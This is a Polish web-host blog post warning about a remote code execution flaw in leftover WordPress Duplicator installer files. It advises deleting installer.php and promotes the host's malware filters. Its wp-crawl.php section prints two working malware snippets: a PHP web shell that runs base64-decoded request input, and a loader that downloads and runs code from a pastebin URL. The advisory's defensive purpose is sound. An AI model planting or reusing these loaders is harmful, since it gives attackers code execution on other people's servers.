Podatność we wtyczce Duplicator WP

11 września, 2018 11:11


img

W popularnej wtyczce WordPress służącej do migracji/kopii zapasowej – Duplicator wykryto podatność na zdalne wykonanie kodu na serwerze (Remote Code Execution), która pozwala zmodyfikować plik wp-config.php i wprowadzić tam złośliwy kod PHP.

Co ważne: Podatność w tym przypadku nie występuje w samym katalogu wtyczki Duplicator. Usterka ujawnia się podczas używania wtyczki Duplicator do migracji lub przywracania kopii zapasowej witryny WordPress.

Podatność znajduje się w plikach instalatora migracji – dlatego istotne jest aby usunąć je zaraz po przeprowadzeniu ‘Restore’ z kopii zapasowej, gdyż wspomniane zdalne wykonanie kodu jest możliwe właśnie dzięki nieumyślnemu pozostawieniu plików po-instalacyjnych na serwerze. Jeśli wykonamy wdrożenie z kopii migracyjnej – pliki te należy usunąć.

Opis i dowód podatności:

Więcej o śledztwie i dowodzie podatności można przeczytać (tekst w jęz. angielskim) w dokumencie, który przygotował synacktiv.com

WordPress_Duplicator-1.2.40-RCE

Aby jednak wyeliminować ryzyko ataku, możesz sprawdzić folder główny swojej witryny i usunąć plik installer.php. To nie jest istotny plik Twojej strony internetowej, to pozostałość po migracji witryny za pomocą wtyczki Duplicator.

Ważne dla bezpieczeństwa! Używając wtyczki Duplicator, pamiętajmy o usunięciu plików instalacyjnych po wykonaniu Przywrócenia (sama wtyczka nam o tym przypomni). Pozostawienie plików instalacyjnych kopii zapasowej na serwerze to poważny błąd.

A generalnie najlepszą metodą jest nie tyle co wyłączanie ale usuwanie wtyczek, których nie używamy.

wp-crawl.php

Istnieje wiele prób włamań do tej luki i powiązane z nim także nowe złośliwe oprogramowanie wp-crawl.php, które umożliwia przesłanie więcej złośliwego kodu na serwer i jego wykonanie, a następnie samoistne usunięcie siebie:

<?php @file_put_contents('tempcrawl','<?php '.base64_decode($_REQUEST['q'])); @include('tempcrawl'); @unlink('tempcrawl');

tempcrawl

<?php $c1 = "https://pastebin.com/raw/6e57ZX4p"; $b = "/tmp/dsgdhgf"; @file_put_contents($b,"<?php ".@file_get_contents($c1)); include($b);@unlink($b);

My blokujemy takie ataki!

Filtry MalwareExperts, którymi chronimy w HitMe serwery naszych klientów z powodzeniem wykrywają to zagrożenie i uniemożliwiają wykonanie złośliwego kodu.

Zachęcamy do korzystania z naszych usług hostingowych aby zwiększyć ochronę swoich stron WWW dzięki narzędziom jakie stosujemy CloudLinux, Malware Expert, imunify 360!

Czytaj więcej o wdrożonym w HitMe rozwiązaniu MalwareExperts!

Polecamy artykuł: HitMe o MalwareExperts

Śledź nas na Facebooku oraz sprawdzaj informacje tu na naszym blogu.

429 wyświetleń

Podziel się lub polub!

Dodaj komentarz

Twój adres email nie zostanie opublikowany. Pola, których wypełnienie jest wymagane, są oznaczone symbolem *

3 × 1 =